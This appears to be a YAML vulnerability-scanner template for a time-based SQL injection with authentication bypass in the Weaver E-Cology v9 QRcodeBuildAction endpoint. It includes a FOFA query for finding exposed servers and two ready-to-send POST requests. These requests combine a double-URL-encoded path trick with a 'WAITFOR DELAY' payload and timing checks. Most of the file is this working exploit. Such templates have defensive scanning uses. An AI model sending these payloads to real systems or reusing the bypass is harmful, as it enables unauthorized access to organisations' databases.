product: 泛微E-Cology
vName: 泛微E-Cology v9 QRcodeBuildAction存在SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 由于泛微E-Cology9 weaver.formmode.servelt.QRcodeBuildAction接口未对用户传入的数据进行严格的校验和过滤，导致攻击者利用多层编码的方式绕过身份认证进行SQL注入。
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://wiki.wy876.cn/#/./泛微OA/泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30
      data: modeid=127+WAITFOR+DELAY+'0%3a0%3a5'
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: ">="
            num: 5
  - exp:
      method: post
      follow: false
      path: /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30
      data: modeid=127+WAITFOR+DELAY+'0%3a0%3a0'
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: "<="
            num: 3